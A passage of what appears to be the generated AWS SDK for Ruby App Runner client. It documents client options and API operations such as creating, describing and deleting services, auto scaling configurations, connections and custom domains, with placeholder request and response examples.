# @option options [Float] :retry_base_delay (0.3)
# The base delay in seconds used by the default backoff function. This option
# is only used in the `legacy` retry mode.
#
# @option options [Symbol] :retry_jitter (:none)
# A delay randomiser function used by the default backoff function.
# Some predefined functions can be referenced by name - :none, :equal, :full,
# otherwise a Proc that takes and returns a number. This option is only used
# in the `legacy` retry mode.
#
# @see https://www.awsarchitectureblog.com/2015/03/backoff.html
#
# @option options [Integer] :retry_limit (3)
# The maximum number of times to retry failed requests. Only
# ~ 500 level server errors and certain ~ 400 level client errors
# are retried. Generally, these are throttling errors, data
# checksum errors, networking errors, timeout errors, auth errors,
# endpoint discovery, and errors from expired credentials.
# This option is only used in the `legacy` retry mode.
#
# @option options [Integer] :retry_max_delay (0)
# The maximum number of seconds to delay between retries (0 for no limit)
# used by the default backoff function. This option is only used in the
# `legacy` retry mode.
#
# @option options [String] :retry_mode ("legacy")
# Specifies which retry algorithm to use. Values are:
#
# * `legacy` - The pre-existing retry behavior. This is default value if
# no retry mode is provided.
#
# * `standard` - A standardized set of retry rules across the AWS SDKs.
# This includes support for retry quotas, which limit the number of
# unsuccessful retries a client can make.
#
# * `adaptive` - An experimental retry mode that includes all the
# functionality of `standard` mode along with automatic client side
# throttling. This is a provisional mode that may change behavior
# in the future.
#
#
# @option options [String] :secret_access_key
#
# @option options [String] :session_token
#
# @option options [Boolean] :simple_json (false)
# Disables request parameter conversion, validation, and formatting.
# Also disable response data type conversions. This option is useful
# when you want to ensure the highest level of performance by
# avoiding overhead of walking request parameters and response data
# structures.
#
# When `:simple_json` is enabled, the request parameters hash must
# be formatted exactly as the DynamoDB API expects.
#
# @option options [Boolean] :stub_responses (false)
# Causes the client to return stubbed responses. By default
# fake responses are generated and returned. You can specify
# the response data to return or errors to raise by calling
# {ClientStubs#stub_responses}. See {ClientStubs} for more information.
#
# ** Please note ** When response stubbing is enabled, no HTTP
# requests are made, and retries are disabled.
#
# @option options [Boolean] :validate_params (true)
# When `true`, request parameters are validated before
# sending the request.
#
# @option options [URI::HTTP,String] :http_proxy A proxy to send
# requests through. Formatted like 'http://proxy.com:123'.
#
# @option options [Float] :http_open_timeout (15) The number of
# seconds to wait when opening a HTTP session before raising a
# `Timeout::Error`.
#
# @option options [Integer] :http_read_timeout (60) The default
# number of seconds to wait for response data. This value can
# safely be set per-request on the session.
#
# @option options [Float] :http_idle_timeout (5) The number of
# seconds a connection is allowed to sit idle before it is
# considered stale. Stale connections are closed and removed
# from the pool before making a request.
#
# @option options [Float] :http_continue_timeout (1) The number of
# seconds to wait for a 100-continue response before sending the
# request body. This option has no effect unless the request has
# "Expect" header set to "100-continue". Defaults to `nil` which
# disables this behaviour. This value can safely be set per
# request on the session.
#
# @option options [Boolean] :http_wire_trace (false) When `true`,
# HTTP debug output will be sent to the `:logger`.
#
# @option options [Boolean] :ssl_verify_peer (true) When `true`,
# SSL peer certificates are verified when establishing a
# connection.
#
# @option options [String] :ssl_ca_bundle Full path to the SSL
# certificate authority bundle file that should be used when
# verifying peer certificates. If you do not pass
# `:ssl_ca_bundle` or `:ssl_ca_directory` the the system default
# will be used if available.
#
# @option options [String] :ssl_ca_directory Full path of the
# directory that contains the unbundled SSL certificate
# authority files for verifying peer certificates. If you do
# not pass `:ssl_ca_bundle` or `:ssl_ca_directory` the the
# system default will be used if available.
#
def initialize(*args)
super
end
# @!group API Operations
# Associate your own domain name with the AWS App Runner subdomain URL
# of your App Runner service.
#
# After you call `AssociateCustomDomain` and receive a successful
# response, use the information in the CustomDomain record that's
# returned to add CNAME records to your Domain Name System (DNS). For
# each mapped domain name, add a mapping to the target App Runner
# subdomain and one or more certificate validation records. App Runner
# then performs DNS validation to verify that you own or control the
# domain name that you associated. App Runner tracks domain validity in
# a certificate stored in [AWS Certificate Manager (ACM)][1].
#
#
#
# [1]: https://docs.aws.amazon.com/acm/latest/userguide
#
# @option params [required, String] :service_arn
# The Amazon Resource Name (ARN) of the App Runner service that you want
# to associate a custom domain name with.
#
# @option params [required, String] :domain_name
# A custom domain endpoint to associate. Specify a root domain (for
# example, `example.com`), a subdomain (for example, `login.example.com`
# or `admin.login.example.com`), or a wildcard (for example,
# `*.example.com`).
#
# @option params [Boolean] :enable_www_subdomain
# Set to `true` to associate the subdomain `www.DomainName ` with the
# App Runner service in addition to the base domain.
#
# Default: `true`
#
# @return [Types::AssociateCustomDomainResponse] Returns a {Seahorse::Client::Response response} object which responds to the following methods:
#
# * {Types::AssociateCustomDomainResponse#dns_target #dns_target} => String
# * {Types::AssociateCustomDomainResponse#service_arn #service_arn} => String
# * {Types::AssociateCustomDomainResponse#custom_domain #custom_domain} => Types::CustomDomain
#
# @example Request syntax with placeholder values
#
# resp = client.associate_custom_domain({
# service_arn: "AppRunnerResourceArn", # required
# domain_name: "DomainName", # required
# enable_www_subdomain: false,
# })
#
# @example Response structure
#
# resp.dns_target #=> String
# resp.service_arn #=> String
# resp.custom_domain.domain_name #=> String
# resp.custom_domain.enable_www_subdomain #=> Boolean
# resp.custom_domain.certificate_validation_records #=> Array
# resp.custom_domain.certificate_validation_records[0].name #=> String
# resp.custom_domain.certificate_validation_records[0].type #=> String
# resp.custom_domain.certificate_validation_records[0].value #=> String
# resp.custom_domain.certificate_validation_records[0].status #=> String, one of "PENDING_VALIDATION", "SUCCESS", "FAILED"
# resp.custom_domain.status #=> String, one of "CREATING", "CREATE_FAILED", "ACTIVE", "DELETING", "DELETE_FAILED", "PENDING_CERTIFICATE_DNS_VALIDATION", "BINDING_CERTIFICATE"
#
# @see http://docs.aws.amazon.com/goto/WebAPI/apprunner-2020-05-15/AssociateCustomDomain AWS API Documentation
#
# @overload associate_custom_domain(params = {})
# @param [Hash] params ({})
def associate_custom_domain(params = {}, options = {})
req = build_request(:associate_custom_domain, params)
req.send_request(options)
end
# Create an AWS App Runner automatic scaling configuration resource. App
# Runner requires this resource when you create App Runner services that
# require non-default auto scaling settings. You can share an auto
# scaling configuration across multiple services.
#
# Create multiple revisions of a configuration by using the same
# `AutoScalingConfigurationName` and different
# `AutoScalingConfigurationRevision` values. When you create a service,
# you can set it to use the latest active revision of an auto scaling
# configuration or a specific revision.
#
# Configure a higher `MinSize` to increase the spread of your App Runner
# service over more Availability Zones in the AWS Region. The tradeoff
# is a higher minimal cost.
#
# Configure a lower `MaxSize` to control your cost. The tradeoff is
# lower responsiveness during peak demand.
#
# @option params [required, String] :auto_scaling_configuration_name
# A name for the auto scaling configuration. When you use it for the
# first time in an AWS Region, App Runner creates revision number `1` of
# this name. When you use the same name in subsequent calls, App Runner
# creates incremental revisions of the configuration.
#
# @option params [Integer] :max_concurrency
# The maximum number of concurrent requests that you want an instance to
# process. If the number of concurrent requests exceeds this limit, App
# Runner scales up your service.
#
# Default: `100`
#
# @option params [Integer] :min_size
# The minimum number of instances that App Runner provisions for your
# service. The service always has at least `MinSize` provisioned
# instances. Some of them actively serve traffic. The rest of them
# (provisioned and inactive instances) are a cost-effective compute
# capacity reserve and are ready to be quickly activated. You pay for
# memory usage of all the provisioned instances. You pay for CPU usage
# of only the active subset.
#
# App Runner temporarily doubles the number of provisioned instances
# during deployments, to maintain the same capacity for both old and new
# code.
#
# Default: `1`
#
# @option params [Integer] :max_size
# The maximum number of instances that your service scales up to. At
# most `MaxSize` instances actively serve traffic for your service.
#
# Default: `25`
#
# @option params [Array<Types::Tag>] :tags
# A list of metadata items that you can associate with your auto scaling
# configuration resource. A tag is a key-value pair.
#
# @return [Types::CreateAutoScalingConfigurationResponse] Returns a {Seahorse::Client::Response response} object which responds to the following methods:
#
# * {Types::CreateAutoScalingConfigurationResponse#auto_scaling_configuration #auto_scaling_configuration} => Types::AutoScalingConfiguration
#
# @example Request syntax with placeholder values
#
# resp = client.create_auto_scaling_configuration({
# auto_scaling_configuration_name: "AutoScalingConfigurationName", # required
# max_concurrency: 1,
# min_size: 1,
# max_size: 1,
# tags: [
# {
# key: "TagKey",
# value: "TagValue",
# },
# ],
# })
#
# @example Response structure
#
# resp.auto_scaling_configuration.auto_scaling_configuration_arn #=> String
# resp.auto_scaling_configuration.auto_scaling_configuration_name #=> String
# resp.auto_scaling_configuration.auto_scaling_configuration_revision #=> Integer
# resp.auto_scaling_configuration.latest #=> Boolean
# resp.auto_scaling_configuration.status #=> String, one of "ACTIVE", "INACTIVE"
# resp.auto_scaling_configuration.max_concurrency #=> Integer
# resp.auto_scaling_configuration.min_size #=> Integer
# resp.auto_scaling_configuration.max_size #=> Integer
# resp.auto_scaling_configuration.created_at #=> Time
# resp.auto_scaling_configuration.deleted_at #=> Time
#
# @see http://docs.aws.amazon.com/goto/WebAPI/apprunner-2020-05-15/CreateAutoScalingConfiguration AWS API Documentation
#
# @overload create_auto_scaling_configuration(params = {})
# @param [Hash] params ({})
def create_auto_scaling_configuration(params = {}, options = {})
req = build_request(:create_auto_scaling_configuration, params)
req.send_request(options)
end
# Create an AWS App Runner connection resource. App Runner requires a
# connection resource when you create App Runner services that access
# private repositories from certain third-party providers. You can share
# a connection across multiple services.
#
# A connection resource is needed to access GitHub repositories. GitHub
# requires a user interface approval process through the App Runner
# console before you can use the connection.
#
# @option params [required, String] :connection_name
# A name for the new connection. It must be unique across all App Runner
# connections for the AWS account in the AWS Region.
#
# @option params [required, String] :provider_type
# The source repository provider.
#
# @option params [Array<Types::Tag>] :tags
# A list of metadata items that you can associate with your connection
# resource. A tag is a key-value pair.
#
# @return [Types::CreateConnectionResponse] Returns a {Seahorse::Client::Response response} object which responds to the following methods:
#
# * {Types::CreateConnectionResponse#connection #connection} => Types::Connection
#
# @example Request syntax with placeholder values
#
# resp = client.create_connection({
# connection_name: "ConnectionName", # required
# provider_type: "GITHUB", # required, accepts GITHUB
# tags: [
# {
# key: "TagKey",
# value: "TagValue",
# },
# ],
# })
#
# @example Response structure
#
# resp.connection.connection_name #=> String
# resp.connection.connection_arn #=> String
# resp.connection.provider_type #=> String, one of "GITHUB"
# resp.connection.status #=> String, one of "PENDING_HANDSHAKE", "AVAILABLE", "ERROR", "DELETED"
# resp.connection.created_at #=> Time
#
# @see http://docs.aws.amazon.com/goto/WebAPI/apprunner-2020-05-15/CreateConnection AWS API Documentation
#
# @overload create_connection(params = {})
# @param [Hash] params ({})
def create_connection(params = {}, options = {})
req = build_request(:create_connection, params)
req.send_request(options)
end
# Create an AWS App Runner service. After the service is created, the
# action also automatically starts a deployment.
#
# This is an asynchronous operation. On a successful call, you can use
# the returned `OperationId` and the [ListOperations][1] call to track
# the operation's progress.
#
#
#
# [1]: https://docs.aws.amazon.com/apprunner/latest/api/API_ListOperations.html
#
# @option params [required, String] :service_name
# A name for the new service. It must be unique across all the running
# App Runner services in your AWS account in the AWS Region.
#
# @option params [required, Types::SourceConfiguration] :source_configuration
# The source to deploy to the App Runner service. It can be a code or an
# image repository.
#
# @option params [Types::InstanceConfiguration] :instance_configuration
# The runtime configuration of instances (scaling units) of the App
# Runner service.
#
# @option params [Array<Types::Tag>] :tags
# An optional list of metadata items that you can associate with your
# service resource. A tag is a key-value pair.
#
# @option params [Types::EncryptionConfiguration] :encryption_configuration
# An optional custom encryption key that App Runner uses to encrypt the
# copy of your source repository that it maintains and your service
# logs. By default, App Runner uses an AWS managed CMK.
#
# @option params [Types::HealthCheckConfiguration] :health_check_configuration
# The settings for the health check that AWS App Runner performs to
# monitor the health of your service.
#
# @option params [String] :auto_scaling_configuration_arn
# The Amazon Resource Name (ARN) of an App Runner automatic scaling
# configuration resource that you want to associate with your service.
# If not provided, App Runner associates the latest revision of a
# default auto scaling configuration.
#
# @return [Types::CreateServiceResponse] Returns a {Seahorse::Client::Response response} object which responds to the following methods:
#
# * {Types::CreateServiceResponse#service #service} => Types::Service
# * {Types::CreateServiceResponse#operation_id #operation_id} => String
#
# @example Request syntax with placeholder values
#
# resp = client.create_service({
# service_name: "ServiceName", # required
# source_configuration: { # required
# code_repository: {
# repository_url: "String", # required
# source_code_version: { # required
# type: "BRANCH", # required, accepts BRANCH
# value: "String", # required
# },
# code_configuration: {
# configuration_source: "REPOSITORY", # required, accepts REPOSITORY, API
# code_configuration_values: {
# runtime: "PYTHON_3", # required, accepts PYTHON_3, NODEJS_12
# build_command: "BuildCommand",
# start_command: "StartCommand",
# port: "String",
# runtime_environment_variables: {
# "RuntimeEnvironmentVariablesKey" => "RuntimeEnvironmentVariablesValue",
# },
# },
# },
# },
# image_repository: {
# image_identifier: "ImageIdentifier", # required
# image_configuration: {
# runtime_environment_variables: {
# "RuntimeEnvironmentVariablesKey" => "RuntimeEnvironmentVariablesValue",
# },
# start_command: "String",
# port: "String",
# },
# image_repository_type: "ECR", # required, accepts ECR, ECR_PUBLIC
# },
# auto_deployments_enabled: false,
# authentication_configuration: {
# connection_arn: "AppRunnerResourceArn",
# access_role_arn: "RoleArn",
# },
# },
# instance_configuration: {
# cpu: "Cpu",
# memory: "Memory",
# instance_role_arn: "RoleArn",
# },
# tags: [
# {
# key: "TagKey",
# value: "TagValue",
# },
# ],
# encryption_configuration: {
# kms_key: "KmsKeyArn", # required
# },
# health_check_configuration: {
# protocol: "TCP", # accepts TCP, HTTP
# path: "String",
# interval: 1,
# timeout: 1,
# healthy_threshold: 1,
# unhealthy_threshold: 1,
# },
# auto_scaling_configuration_arn: "AppRunnerResourceArn",
# })
#
# @example Response structure
#
# resp.service.service_name #=> String
# resp.service.service_id #=> String
# resp.service.service_arn #=> String
# resp.service.service_url #=> String
# resp.service.created_at #=> Time
# resp.service.updated_at #=> Time
# resp.service.deleted_at #=> Time
# resp.service.status #=> String, one of "CREATE_FAILED", "RUNNING", "DELETED", "DELETE_FAILED", "PAUSED", "OPERATION_IN_PROGRESS"
# resp.service.source_configuration.code_repository.repository_url #=> String
# resp.service.source_configuration.code_repository.source_code_version.type #=> String, one of "BRANCH"
# resp.service.source_configuration.code_repository.source_code_version.value #=> String
# resp.service.source_configuration.code_repository.code_configuration.configuration_source #=> String, one of "REPOSITORY", "API"
# resp.service.source_configuration.code_repository.code_configuration.code_configuration_values.runtime #=> String, one of "PYTHON_3", "NODEJS_12"
# resp.service.source_configuration.code_repository.code_configuration.code_configuration_values.build_command #=> String
# resp.service.source_configuration.code_repository.code_configuration.code_configuration_values.start_command #=> String
# resp.service.source_configuration.code_repository.code_configuration.code_configuration_values.port #=> String
# resp.service.source_configuration.code_repository.code_configuration.code_configuration_values.runtime_environment_variables #=> Hash
# resp.service.source_configuration.code_repository.code_configuration.code_configuration_values.runtime_environment_variables["RuntimeEnvironmentVariablesKey"] #=> String
# resp.service.source_configuration.image_repository.image_identifier #=> String
# resp.service.source_configuration.image_repository.image_configuration.runtime_environment_variables #=> Hash
# resp.service.source_configuration.image_repository.image_configuration.runtime_environment_variables["RuntimeEnvironmentVariablesKey"] #=> String
# resp.service.source_configuration.image_repository.image_configuration.start_command #=> String
# resp.service.source_configuration.image_repository.image_configuration.port #=> String
# resp.service.source_configuration.image_repository.image_repository_type #=> String, one of "ECR", "ECR_PUBLIC"
# resp.service.source_configuration.auto_deployments_enabled #=> Boolean
# resp.service.source_configuration.authentication_configuration.connection_arn #=> String
# resp.service.source_configuration.authentication_configuration.access_role_arn #=> String
# resp.service.instance_configuration.cpu #=> String
# resp.service.instance_configuration.memory #=> String
# resp.service.instance_configuration.instance_role_arn #=> String
# resp.service.encryption_configuration.kms_key #=> String
# resp.service.health_check_configuration.protocol #=> String, one of "TCP", "HTTP"
# resp.service.health_check_configuration.path #=> String
# resp.service.health_check_configuration.interval #=> Integer
# resp.service.health_check_configuration.timeout #=> Integer
# resp.service.health_check_configuration.healthy_threshold #=> Integer
# resp.service.health_check_configuration.unhealthy_threshold #=> Integer
# resp.service.auto_scaling_configuration_summary.auto_scaling_configuration_arn #=> String
# resp.service.auto_scaling_configuration_summary.auto_scaling_configuration_name #=> String
# resp.service.auto_scaling_configuration_summary.auto_scaling_configuration_revision #=> Integer
# resp.operation_id #=> String
#
# @see http://docs.aws.amazon.com/goto/WebAPI/apprunner-2020-05-15/CreateService AWS API Documentation
#
# @overload create_service(params = {})
# @param [Hash] params ({})
def create_service(params = {}, options = {})
req = build_request(:create_service, params)
req.send_request(options)
end
# Delete an AWS App Runner automatic scaling configuration resource. You
# can delete a specific revision or the latest active revision. You
# can't delete a configuration that's used by one or more App Runner
# services.
#
# @option params [required, String] :auto_scaling_configuration_arn
# The Amazon Resource Name (ARN) of the App Runner auto scaling
# configuration that you want to delete.
#
# The ARN can be a full auto scaling configuration ARN, or a partial ARN
# ending with either `.../name ` or `.../name/revision `. If a revision
# isn't specified, the latest active revision is deleted.
#
# @return [Types::DeleteAutoScalingConfigurationResponse] Returns a {Seahorse::Client::Response response} object which responds to the following methods:
#
# * {Types::DeleteAutoScalingConfigurationResponse#auto_scaling_configuration #auto_scaling_configuration} => Types::AutoScalingConfiguration
#
# @example Request syntax with placeholder values
#
# resp = client.delete_auto_scaling_configuration({
# auto_scaling_configuration_arn: "AppRunnerResourceArn", # required
# })
#
# @example Response structure
#
# resp.auto_scaling_configuration.auto_scaling_configuration_arn #=> String
# resp.auto_scaling_configuration.auto_scaling_configuration_name #=> String
# resp.auto_scaling_configuration.auto_scaling_configuration_revision #=> Integer
# resp.auto_scaling_configuration.latest #=> Boolean
# resp.auto_scaling_configuration.status #=> String, one of "ACTIVE", "INACTIVE"
# resp.auto_scaling_configuration.max_concurrency #=> Integer
# resp.auto_scaling_configuration.min_size #=> Integer
# resp.auto_scaling_configuration.max_size #=> Integer
# resp.auto_scaling_configuration.created_at #=> Time
# resp.auto_scaling_configuration.deleted_at #=> Time
#
# @see http://docs.aws.amazon.com/goto/WebAPI/apprunner-2020-05-15/DeleteAutoScalingConfiguration AWS API Documentation
#
# @overload delete_auto_scaling_configuration(params = {})
# @param [Hash] params ({})
def delete_auto_scaling_configuration(params = {}, options = {})
req = build_request(:delete_auto_scaling_configuration, params)
req.send_request(options)
end
# Delete an AWS App Runner connection. You must first ensure that there
# are no running App Runner services that use this connection. If there
# are any, the `DeleteConnection` action fails.
#
# @option params [required, String] :connection_arn
# The Amazon Resource Name (ARN) of the App Runner connection that you
# want to delete.
#
# @return [Types::DeleteConnectionResponse] Returns a {Seahorse::Client::Response response} object which responds to the following methods:
#
# * {Types::DeleteConnectionResponse#connection #connection} => Types::Connection
#
# @example Request syntax with placeholder values
#
# resp = client.delete_connection({
# connection_arn: "AppRunnerResourceArn", # required
# })
#
# @example Response structure
#
# resp.connection.connection_name #=> String
# resp.connection.connection_arn #=> String
# resp.connection.provider_type #=> String, one of "GITHUB"
# resp.connection.status #=> String, one of "PENDING_HANDSHAKE", "AVAILABLE", "ERROR", "DELETED"
# resp.connection.created_at #=> Time
#
# @see http://docs.aws.amazon.com/goto/WebAPI/apprunner-2020-05-15/DeleteConnection AWS API Documentation
#
# @overload delete_connection(params = {})
# @param [Hash] params ({})
def delete_connection(params = {}, options = {})
req = build_request(:delete_connection, params)
req.send_request(options)
end
# Delete an AWS App Runner service.
#
# This is an asynchronous operation. On a successful call, you can use
# the returned `OperationId` and the ListOperations call to track the
# operation's progress.
#
# @option params [required, String] :service_arn
# The Amazon Resource Name (ARN) of the App Runner service that you want
# to delete.
#
# @return [Types::DeleteServiceResponse] Returns a {Seahorse::Client::Response response} object which responds to the following methods:
#
# * {Types::DeleteServiceResponse#service #service} => Types::Service
# * {Types::DeleteServiceResponse#operation_id #operation_id} => String
#
# @example Request syntax with placeholder values
#
# resp = client.delete_service({
# service_arn: "AppRunnerResourceArn", # required
# })
#
# @example Response structure
#
# resp.service.service_name #=> String
# resp.service.service_id #=> String
# resp.service.service_arn #=> String
# resp.service.service_url #=> String
# resp.service.created_at #=> Time
# resp.service.updated_at #=> Time
# resp.service.deleted_at #=> Time
# resp.service.status #=> String, one of "CREATE_FAILED", "RUNNING", "DELETED", "DELETE_FAILED", "PAUSED", "OPERATION_IN_PROGRESS"
# resp.service.source_configuration.code_repository.repository_url #=> String
# resp.service.source_configuration.code_repository.source_code_version.type #=> String, one of "BRANCH"
# resp.service.source_configuration.code_repository.source_code_version.value #=> String
# resp.service.source_configuration.code_repository.code_configuration.configuration_source #=> String, one of "REPOSITORY", "API"
# resp.service.source_configuration.code_repository.code_configuration.code_configuration_values.runtime #=> String, one of "PYTHON_3", "NODEJS_12"
# resp.service.source_configuration.code_repository.code_configuration.code_configuration_values.build_command #=> String
# resp.service.source_configuration.code_repository.code_configuration.code_configuration_values.start_command #=> String
# resp.service.source_configuration.code_repository.code_configuration.code_configuration_values.port #=> String
# resp.service.source_configuration.code_repository.code_configuration.code_configuration_values.runtime_environment_variables #=> Hash
# resp.service.source_configuration.code_repository.code_configuration.code_configuration_values.runtime_environment_variables["RuntimeEnvironmentVariablesKey"] #=> String
# resp.service.source_configuration.image_repository.image_identifier #=> String
# resp.service.source_configuration.image_repository.image_configuration.runtime_environment_variables #=> Hash
# resp.service.source_configuration.image_repository.image_configuration.runtime_environment_variables["RuntimeEnvironmentVariablesKey"] #=> String
# resp.service.source_configuration.image_repository.image_configuration.start_command #=> String
# resp.service.source_configuration.image_repository.image_configuration.port #=> String
# resp.service.source_configuration.image_repository.image_repository_type #=> String, one of "ECR", "ECR_PUBLIC"
# resp.service.source_configuration.auto_deployments_enabled #=> Boolean
# resp.service.source_configuration.authentication_configuration.connection_arn #=> String
# resp.service.source_configuration.authentication_configuration.access_role_arn #=> String
# resp.service.instance_configuration.cpu #=> String
# resp.service.instance_configuration.memory #=> String
# resp.service.instance_configuration.instance_role_arn #=> String
# resp.service.encryption_configuration.kms_key #=> String
# resp.service.health_check_configuration.protocol #=> String, one of "TCP", "HTTP"
# resp.service.health_check_configuration.path #=> String
# resp.service.health_check_configuration.interval #=> Integer
# resp.service.health_check_configuration.timeout #=> Integer
# resp.service.health_check_configuration.healthy_threshold #=> Integer
# resp.service.health_check_configuration.unhealthy_threshold #=> Integer
# resp.service.auto_scaling_configuration_summary.auto_scaling_configuration_arn #=> String
# resp.service.auto_scaling_configuration_summary.auto_scaling_configuration_name #=> String
# resp.service.auto_scaling_configuration_summary.auto_scaling_configuration_revision #=> Integer
# resp.operation_id #=> String
#
# @see http://docs.aws.amazon.com/goto/WebAPI/apprunner-2020-05-15/DeleteService AWS API Documentation
#
# @overload delete_service(params = {})
# @param [Hash] params ({})
def delete_service(params = {}, options = {})
req = build_request(:delete_service, params)
req.send_request(options)
end
# Return a full description of an AWS App Runner automatic scaling
# configuration resource.
#
# @option params [required, String] :auto_scaling_configuration_arn
# The Amazon Resource Name (ARN) of the App Runner auto scaling
# configuration that you want a description for.
#
# The ARN can be a full auto scaling configuration ARN, or a partial ARN
# ending with either `.../name ` or `.../name/revision `. If a revision
# isn't specified, the latest active revision is described.
#
# @return [Types::DescribeAutoScalingConfigurationResponse] Returns a {Seahorse::Client::Response response} object which responds to the following methods:
#
# * {Types::DescribeAutoScalingConfigurationResponse#auto_scaling_configuration #auto_scaling_configuration} => Types::AutoScalingConfiguration
#
# @example Request syntax with placeholder values
#
# resp = client.describe_auto_scaling_configuration({
# auto_scaling_configuration_arn: "AppRunnerResourceArn", # required
# })
#
# @example Response structure
#
# resp.auto_scaling_configuration.auto_scaling_configuration_arn #=> String
# resp.auto_scaling_configuration.auto_scaling_configuration_name #=> String
# resp.auto_scaling_configuration.auto_scaling_configuration_revision #=> Integer
# resp.auto_scaling_configuration.latest #=> Boolean
# resp.auto_scaling_configuration.status #=> String, one of "ACTIVE", "INACTIVE"
# resp.auto_scaling_configuration.max_concurrency #=> Integer
# resp.auto_scaling_configuration.min_size #=> Integer
# resp.auto_scaling_configuration.max_size #=> Integer
# resp.auto_scaling_configuration.created_at #=> Time
# resp.auto_scaling_configuration.deleted_at #=> Time
#
# @see http://docs.aws.amazon.com/goto/WebAPI/apprunner-2020-05-15/DescribeAutoScalingConfiguration AWS API Documentation
#
# @overload describe_auto_scaling_configuration(params = {})
# @param [Hash] params ({})
def describe_auto_scaling_configuration(params = {}, options = {})
req = build_request(:describe_auto_scaling_configuration, params)
req.send_request(options)
end
# Return a description of custom domain names that are associated with
# an AWS App Runner service.
#
# @option params [required, String] :service_arn
# The Amazon Resource Name (ARN) of the App Runner service that you want
# associated custom domain names to be described for.
#
# @option params [String] :next_token
# A token from a previous result page. It's used for a paginated
# request. The request retrieves the next result page. All other
# parameter values must be identical to the ones that are specified in
# the initial request.
#
# If you don't specify `NextToken`, the request retrieves the first
# result page.
#
# @option params [Integer] :max_results
# The maximum number of results that each response (result page) can
# include. It's used for a paginated request.
#
# If you don't specify `MaxResults`, the request retrieves all
# available results in a single response.
#
# @return [Types::DescribeCustomDomainsResponse] Returns a {Seahorse::Client::Response response} object which responds to the following methods:
#
# * {Types::DescribeCustomDomainsResponse#dns_target #dns_target} => String
# * {Types::DescribeCustomDomainsResponse#service_arn #service_arn} => String
# * {Types::DescribeCustomDomainsResponse#custom_domains #custom_domains} => Array<Types::CustomDomain>
# * {Types::DescribeCustomDomainsResponse#next_token #next_token} => String
#
# The returned {Seahorse::Client::Response response} is a pageable response and is Enumerable. For details on usage see {Aws::PageableResponse PageableResponse}.
#
# @example Request syntax with placeholder values
#
# resp = client.describe_custom_domains({
# service_arn: "AppRunnerResourceArn", # required
# next_token: "String",
# max_results: 1,
# })
#
# @example Response structure
#
# resp.dns_target #=> String
# resp.service_arn #=> String
# resp.custom_domains #=> Array
# resp.custom_domains[0].domain_name #=> String
# resp.custom_domains[0].enable_www_subdomain #=> Boolean
# resp.custom_domains[0].certificate_validation_records #=> Array
# resp.custom_domains[0].certificate_validation_records[0].name #=> String
# resp.custom_domains[0].certificate_validation_records[0].type #=> String
# resp.custom_domains[0].certificate_validation_records[0].value #=> String
# resp.custom_domains[0].certificate_validation_records[0].status #=> String, one of "PENDING_VALIDATION", "SUCCESS", "FAILED"
# resp.custom_domains[0].status #=> String, one of "CREATING", "CREATE_FAILED", "ACTIVE", "DELETING", "DELETE_FAILED", "PENDING_CERTIFICATE_DNS_VALIDATION", "BINDING_CERTIFICATE"
# resp.next_token #=> String
#
# @see http://docs.aws.amazon.com/goto/WebAPI/apprunner-2020-05-15/DescribeCustomDomains AWS API Documentation
#
# @overload describe_custom_domains(params = {})
# @param [Hash] params ({})
def describe_custom_domains(params = {}, options = {})
req = build_request(:describe_custom_domains, params)
req.send_request(options)
end
# Return a full description of an AWS App Runner service.
#
# @option params [required, String] :service_arn
# The Amazon Resource Name (ARN) of the App Runner service that you want
# a description for.
#
# @return [Types::DescribeServiceResponse] Returns a {Seahorse::Client::Response response} object which responds to the following methods:
#
# * {Types::DescribeServiceResponse#service #service} => Types::Service
#
# @example Request syntax with placeholder values
#
# resp = client.describe_service({
# service_arn: "AppRunnerResourceArn", # required
# })
#
# @example Response structure
#
# resp.service.service_name #=> String
# resp.service.service_id #=> String
# resp.service.service_arn #=> String
# resp.service.service_url #=> String
# resp.service.created_at #=> Time
# resp.service.updated_at #=> Time
# resp.service.deleted_at #=> Time
# resp.service.status #=> String, one of "CREATE_FAILED", "RUNNING", "DELETED", "DELETE_FAILED", "PAUSED", "OPERATION_IN_PROGRESS"
# resp.service.source_configuration.code_repository.repository_url #=> String
# resp.service.source_configuration.code_repository.source_code_version.type #=> String, one of "BRANCH"
# resp.service.source_configuration.code_repository.source_code_version.value #=> String
# resp.service.source_configuration.code_repository.code_configuration.configuration_source #=> String, one of "REPOSITORY", "API"
# resp.service.source_configuration.code_repository.code_configuration.code_configuration_values.runtime #=> String, one of "PYTHON_3", "NODEJS_12"
# resp.service.source_configuration.code_repository.code_configuration.code_configuration_values.build_command #=> String
# resp.service.source_configuration.code_repository.code_configuration.code_configuration_values.start_command #=> String
# resp.service.source_configuration.code_repository.code_configuration.code_configuration_values.port #=> String
# resp.service.source_configuration.code_repository.code_configuration.code_configuration_values.runtime_environment_variables #=> Hash
# resp.service.source_configuration.code_repository.code_configuration.code_configuration_values.runtime_environment_variables["RuntimeEnvironmentVariablesKey"] #=> String
# resp.service.source_configuration.image_repository.image_identifier #=> String
# resp.service.source_configuration.image_repository.image_configuration.runtime_environment_variables #=> Hash
# resp.service.source_configuration.image_repository.image_configuration.runtime_environment_variables["RuntimeEnvironmentVariablesKey"] #=> String
# resp.service.source_configuration.image_repository.image_configuration.start_command #=> String
# resp.service.source_configuration.image_repository.image_configuration.port #=> String
# resp.service.source_configuration.image_repository.image_repository_type #=> String, one of "ECR", "ECR_PUBLIC"
# resp.service.source_configuration.auto_deployments_enabled #=> Boolean
# resp.service.source_configuration.authentication_configuration.connection_arn #=> String
# resp.service.source_configuration.authentication_configuration.access_role_arn #=> String
# resp.service.instance_configuration.cpu #=> String
# resp.service.instance_configuration.memory #=> String
# resp.service.instance_configuration.instance_role_arn #=> String
# resp.service.encryption_configuration.kms_key #=> String
# resp.service.health_check_configuration.protocol #=> String, one of "TCP", "HTTP"
# resp.service.health_check_configuration.path #=> String
# resp.service.health_check_configuration.interval #=> Integer
# resp.service.health_check_configuration.timeout #=> Integer
# resp.service.health_check_configuration.healthy_threshold #=> Integer
# resp.service.health_check_configuration.unhealthy_threshold #=> Integer
# resp.service.auto_scaling_configuration_summary.auto_scaling_configuration_arn #=> String
# resp.service.auto_scaling_configuration_summary.auto_scaling_configuration_name #=> String
# resp.service.auto_scaling_configuration_summary.auto_scaling_configuration_revision #=> Integer
#
# @see http://docs.aws.amazon.com/goto/WebAPI/apprunner-2020-05-15/DescribeService AWS API Documentation
#
# @overload describe_service(params = {})
# @param [Hash] params ({})
def describe_service(params = {}, options = {})
req = build_request(:describe_service, params)
req.send_request(options)
end
# Disassociate a custom domain name from an AWS App Runner service.
#
# Certificates tracking domain validity are associated with a custom
# domain and are stored in [AWS Certificate Manager (ACM)][1]. These
# certificates aren't deleted as part of this action. App Runner delays
# certificate deletion for 30 days after a domain is disassociated from
